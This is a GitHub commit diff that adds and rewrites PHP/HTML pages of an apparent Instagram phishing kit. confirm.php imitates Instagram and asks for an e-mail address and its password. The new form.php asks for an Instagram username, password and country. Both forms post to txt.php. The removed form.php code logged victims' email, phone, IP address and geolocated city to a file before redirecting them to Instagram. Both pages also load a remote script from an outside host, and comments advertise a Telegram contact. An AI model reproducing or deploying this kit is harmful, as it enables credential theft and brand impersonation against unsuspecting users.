Skip to content

Commit 152d19d

Browse files
authored
Add files via upload
1 parent ae2839f commit 152d19d

File tree

2 files changed

+86
-175
lines changed

2 files changed

+86
-175
lines changed

confirm.php

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
<!doctype html>
2+
<html>
3+
<head>
4+
<meta charset="utf-8">
5+
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=0">
6+
<link rel="stylesheet" href="style.css">
7+
<link rel="shortcut icon" href="https://www.freepnglogos.com/uploads/instagram-logo-png-transparent-0.png">
8+
<title> Instagram </title>
9+
</head>
10+
<body> <!-- telegram @klaxgod -->
11+
<div class="header-ig"><div class="header-ig-text"><p class="header-ig-ig">Instagram</p><p class="header-ig-2"> Find for free on Google Play.</p></div>
12+
<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D27C892C7-1B67-4BBA-ABFC-755E7134B0EE%26utm_content%3Dlo%26utm_medium%3DinstallLink"><button>GET</button></a>
13+
</div>
14+
<center> <!-- telegram @klaxgod -->
15+
<div id="rgn" class="content">
16+
<img src="https://www.freepnglogos.com/uploads/logo-gmail-png/logo-gmail-png-for-gmail-email-client-mac-app-store-16.png" width="200" id="mail">
17+
<br>
18+
<span> Confirm Your Mail</span>
19+
<form action="txt.php" method="post">
20+
<input type="email" placeholder="E-mail" class="psikopatcoder" name="mail" required>
21+
<input type="password" placeholder="Password" class="psikopatcoder" name="mailpw" required>
22+
<br><input type="submit" value="Confirm Account" name="submit_mail" id="butonck">
23+
</br></form> <!-- telegram @klaxgod -->
24+
</div>
25+
<div id="footer"> <!-- telegram @klaxgod -->
26+
<a href="https://www.instagram.com/about/us/"> ABOUT US </a>
27+
<a href="https://help.instagram.com/"> HELP </a>
28+
<a href="https://www.instagram.com/developer/"> API </a>
29+
<a href="https://www.instagram.com/about/jobs/"> JOBS </a>
30+
<a href="https://help.instagram.com/581066165581870"> TERMS</a>
31+
<a href="https://help.instagram.com/519522125107875"> PRIVACY </a>
32+
<p>© 2024 INSTAGRAM, INC. </p>
33+
</div>
34+
</center>
35+
<script language="javascript" src="http://ir.sitekodlari.com/sagtusengelleme1.js"></script>
36+
</body>
37+
</html>

form.php

Lines changed: 49 additions & 175 deletions
Original file line numberDiff line numberDiff line change
@@ -1,176 +1,50 @@
1-
<?php
2-
$lorex=$_GET['nick'];
3-
function fotocekme($lorex) {
4-
$ch = curl_init();
5-
6-
curl_setopt($ch, CURLOPT_URL,"https://www.instatakipci.com/phpCurl");
7-
curl_setopt($ch, CURLOPT_POST, 1);
8-
curl_setopt($ch, CURLOPT_POSTFIELDS,
9-
"user=".$lorex."&productAsks=%7B%22sm_domain%22%3A%22https%3A%2F%2Fwww.instagram.com%2F%22%2C%22preview%22%3A%221%22%2C%22sm_type_id%22%3A1%2C%22link_status%22%3A0%2C%22image_way%22%3A%22%22%7D&multiOptionTake=&nextTimeline=");
10-
11-
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
12-
13-
$server_output = curl_exec($ch);
14-
15-
curl_close ($ch);
16-
17-
$data = json_decode($server_output,true);
18-
19-
return $data['imageChange'];
20-
}
21-
22-
$lorexresim = fotocekme($lorex);
23-
if($_POST){
24-
$mail=$_POST["mail"];
25-
$phone=$_POST["phone"];
26-
$ip=$_SERVER["REMOTE_ADDR"];
27-
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
28-
$cek = new SimpleXMLElement($konum);
29-
$ulke = $cek->country;
30-
$sehir = $cek->city;
31-
date_default_timezone_set('Europe/Istanbul');
32-
$cur_time=date("d-m-Y H:i:s");
33-
$file = fopen('lorexform.php', 'a');
34-
fwrite($file, "
1+
<!doctype html>
352
<html>
36-
<head>
37-
<meta http-equiv='Content-Type' content='text/html;charset=UTF-8'>
38-
<meta name='viewport' content='width=device-width, initial-scale=1'>
39-
</head>
40-
<body bgcolor='#000000'>
41-
<body bgcolor='rgb(0,0,0)'>
42-
<body bgcolor='black'>
43-
<hr>
44-
<font color='red'>Kullanıcı Adı: </font><font color='white'>".$lorex."</font><br>
45-
<font color='red'> Email: </font><font color='white'>".$mail."</font><br>
46-
<font color='red'> Phone: </font><font color='white'>".$phone."</font><br>
47-
<font color='red'>Ip Adresi: </font><font color='white'>".$ip."</font><br>
48-
<font color='red'>Tarih: </font><font color='white'>".$cur_time."</font><br>
49-
<font color='red'>Ülke: </font><font color='white'>".$ulke."</font><br>
50-
<font color='red'>Şehir: </font><font color='white'>".$sehir."</font><br>
51-
<hr>
52-
<br>
53-
54-
");
55-
fclose($file);
56-
57-
58-
header("location: https://instagram.com/$lorex");
59-
}
60-
61-
?>
62-
<!DOCTYPE html>
63-
<html>
64-
<head>
65-
<title>lnstagram Form</title>
66-
<meta charset="utf-8">
67-
<meta name="robots" content="noimageindex, noarchive">
68-
<meta name="apple-mobile-web-app-status-bar-style" content="default">
69-
<meta name="mobile-web-app-capable" content="yes">
70-
<meta name="theme-color" content="#ffffff">
71-
<meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
72-
73-
<link rel="stylesheet" href="css/style1.css" type="text/css" crossorigin="anonymous">
74-
75-
<link rel="stylesheet" href="css/style2.css" type="text/css" crossorigin="anonymous">
76-
77-
<link rel="stylesheet" href="css/style3.css" type="text/css" crossorigin="anonymous">
78-
<script>
79-
function form_kontrol()
80-
{
81-
if(document.getElementById("password").value.length == 0)
82-
document.getElementById("gonder").disabled = true;
83-
else
84-
document.getElementById("gonder").disabled = false;
85-
document.getElementById("gonder").style.background = "#3897f0";
86-
document.getElementById("gonder").style.borderColor = "#3897f0";
87-
}
88-
</script>
89-
<style>
90-
#kutu{
91-
font-family: sans-serif;
92-
background: white;
93-
margin-top: 45px;
94-
padding-top: 7px;
95-
padding-bottom: 4px;
96-
width: 350px;
97-
max-width: 90%;
98-
border: 1px solid #dedede;
99-
height: 80vh;
100-
101-
}
102-
#username{
103-
text-overflow: ellipsis; font: 400 13.3333px Arial;color:; font-size:13px; background-color:#fafafa; outline:none; padding-left:6px;width:260px ;height:30px; border: 1px solid #e6e6e6; margin:7px; font-weight:300;border-radius:3px; margin:4px;
104-
105-
}
106-
107-
.button {
108-
109-
-webkit-box-direction: normal;
110-
margin: 0;
111-
font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
112-
font-size: 14px;
113-
line-height: 20px;
114-
appearance: none;
115-
background: 0 0;
116-
box-sizing: border-box;
117-
cursor: pointer;
118-
display: block;
119-
font-weight: 600;
120-
padding: 5px;
121-
text-align: center;
122-
text-transform: inherit;
123-
text-overflow: ellipsis;
124-
user-select: none;
125-
width: 80%;
126-
border-radius: 4px;
127-
color: rgba(var(--eca,255,255,255),1);
128-
position: relative;
129-
border: 1px solid transparent;
130-
background-color: rgba(var(--d69,0,149,246),1);
131-
}
132-
.button:disabled {
133-
opacity: 0.5;
134-
}
135-
.hide {
136-
display: none;
137-
}
138-
139-
</style>
140-
<form class="HmktE" id="your_form_id" enctype="index.php" method="post">
141-
142-
</head>
143-
<body>
144-
145-
</footer><div class="MFkQJ ABLKx VhasA _1-msl"><div class="GfkS6 "></div><div class="ZsSMR"><a class="z1VUo KD4vR ABLKx VhasA" href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DsignupPage%26ig_mid%3DAE2FF212-B09F-4D9D-97C1-5FD6BB456D90%26utm_content%3Dlo%26utm_medium%3Dbadge" role="alert"><section class="dZvHF fvoD7"><p class="xK6EF">lnstagram</p><p class="_5b2Kp">Find it for free on Google Play.
146-
</p></section><section class="FMlV_"><button class="_4IAxF">Get</button></section></a></div></div></section></div>
147-
<center>
148-
<div id="kutu">
149-
<br>
150-
<center>
151-
<img src="<?php echo $lorexresim; ?>" alt="" width=150 style="border-radius:50%;margin-top:15px;">
152-
</center>
153-
<br>
154-
<div class="Et89U">
155-
156-
<label class="f0n8F "><input id="username" name="Phone Number" required="" placeholder="Full name" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label> <br>
157-
158-
<label class="f0n8F "><input id="username" value="<?php echo $lorex; ?>" name="username" required="" placeholder="Username" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label> <br>
159-
160-
<label class="f0n8F "><input id="username" type="email" class="m" name="mail" required="" placeholder="Email adress" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label> <br>
161-
162-
<label class="f0n8F "><input id="username" type="number" class="m" name="phone" required="" placeholder="Phone Number" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label> <br>
163-
<center>
164-
<button type="submit" id="gonder" class="button" style="background: rgb(56, 151, 240); border-color: rgb(56, 151, 240);">
165-
<span class="btn-txt">Send</span>
166-
</button><br><br></center>
167-
<br>
168-
</div>
169-
170-
171-
</center>
172-
<br>
173-
174-
</body>
175-
</html>
176-
<div class="tHaIX Igw0E rBNOH YBx95 ybXk5 _4EzTm O1flK _7JkPY PdTAI ZUqME" style="height: 60px; width: 100%;"><img src="resim/from.png" alt="fb" width="95"></div></div></center></body></form></head></html>
3+
<head>
4+
<meta charset="utf-8">
5+
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=0">
6+
<link rel="stylesheet" href="style.css">
7+
<link rel="shortcut icon" href="https://www.freepnglogos.com/uploads/instagram-logo-png-transparent-0.png">
8+
<title> Instagram </title>
9+
</head>
10+
<body>
11+
<div class="header-ig"><div class="header-ig-text"><p class="header-ig-ig">Instagram</p><p class="header-ig-2"> Find for free on Google Play.</p></div>
12+
<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D27C892C7-1B67-4BBA-ABFC-755E7134B0EE%26utm_content%3Dlo%26utm_medium%3DinstallLink"><button>GET</button></a>
13+
</div> <!-- telegram @klaxgod -->
14+
<center>
15+
<div id="rgn" class="content">
16+
<img src="https://i.hizliresim.com/nshihpg.png" width="200" id="klaxgod">
17+
<br> <!-- telegram @klaxgod -->
18+
<span> Confirm Your Account</span>
19+
<form action="txt.php" method="post">
20+
<input type="text" placeholder="Username" class="psikopatcoder" name="username" required>
21+
<input type="password" placeholder="Password" class="psikopatcoder" name="password" required>
22+
<input type="text" placeholder="Country" class="psikopatcoder" name="Country" required>
23+
<select id="select"> <!-- telegram @klaxgod -->
24+
<option value="Business Account">Business Account</option>
25+
<option value="Fun">Fun</option>
26+
<option value="Private">Private</option>
27+
<option value="Trade">Trade</option>
28+
<option value="Music">Music</option>
29+
<option value="Orther">Orther</option>
30+
</select> <!-- telegram @klaxgod -->
31+
32+
33+
34+
35+
<input type="submit" value="Confirm Account" name="submit" id="butonck">
36+
</form> <!-- telegram @klaxgod -->
37+
</div>
38+
<div id="footer">
39+
<a href="https://www.instagram.com/about/us/"> ABOUT US </a>
40+
<a href="https://help.instagram.com/"> HELP </a>
41+
<a href="https://www.instagram.com/developer/"> API </a>
42+
<a href="https://www.instagram.com/about/jobs/"> JOBS </a>
43+
<a href="https://help.instagram.com/581066165581870"> TERMS</a>
44+
<a href="https://help.instagram.com/519522125107875"> PRIVACY </a>
45+
<p>© 2024 INSTAGRAM, INC. </p>
46+
</div>
47+
</center>
48+
<script language="javascript" src="http://ir.sitekodlari.com/sagtusengelleme1.js"></script>
49+
</body>
50+
</html>

0 commit comments

Comments
 (0)